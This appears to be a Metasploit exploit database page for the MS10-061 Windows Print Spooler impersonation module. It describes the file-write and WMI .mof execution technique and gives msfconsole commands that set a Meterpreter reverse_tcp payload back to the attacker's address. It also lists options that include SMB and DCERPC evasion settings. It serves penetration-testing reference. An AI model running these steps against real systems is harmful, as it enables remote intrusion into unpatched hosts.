Microsoft Print Spooler Service Impersonation Vulnerability | Metasploit Exploit Database (DB)

Microsoft Print Spooler Service Impersonation Vulnerability

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.

Search Other Modules


Exploit Rank

  • Excellent

Exploit Authors

  • jduck < jduck [at] metasploit.com >
  • hdm < hdm [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Windows Universal (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show payloads
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP]
msf exploit(ms10_061_spoolss) > exploit


Exploit Module Options

PNAME The printer share name to use on the target
RHOST The target address
RPORT Set the SMB service port (default: 445)
SMBPIPE The named pipe for the spooler service (default: spoolss)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DCERPC::ReadTimeout The number of seconds to wait for DCERPC responses
DisablePayloadHandler Disable the handler code for the selected payload
EXE::Custom Use custom exe instead of automatically generating a payload exe
EXE::FallBack Use the default template in case the specified one is missing
EXE::Inject Set to preserve the original EXE function
EXE::OldMethod Set to use the substitution EXE generation method.
EXE::Path The directory in which to look for the executable template
EXE::Template The executable template file name.
EnableContextEncoding Use transient context when encoding payloads
NTLM::SendLM Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies Use a proxy chain
SMB::ChunkSize The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM The Native LM to send during authentication
SMB::Native_OS The Native OS to send during authentication
SMB::VerifySignature Enforces client-side verification of server response signatures
SMBDirect The target port is a raw SMB service (not NetBIOS)
SMBDomain The Windows domain to use for authentication
SMBName The NetBIOS hostname (required for port 139 connections)
SMBPass The password for the specified username
SMBUser The username to authenticate as
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
DCERPC::fake_bind_multi Use multi-context bind calls
DCERPC::fake_bind_multi_append Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio Use a different delivery method for accessing named pipes (accepted: rw, trans)
SMB::obscure_trans_pipe_level Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level Place extra padding between headers and data (level 0-3)
SMB::pad_file_level Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size Maximum buffer size for pipe reads
SMB::pipe_read_min_size Minimum buffer size for pipe reads
SMB::pipe_write_max_size Maximum buffer size for pipe writes
SMB::pipe_write_min_size Minimum buffer size for pipe writes
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)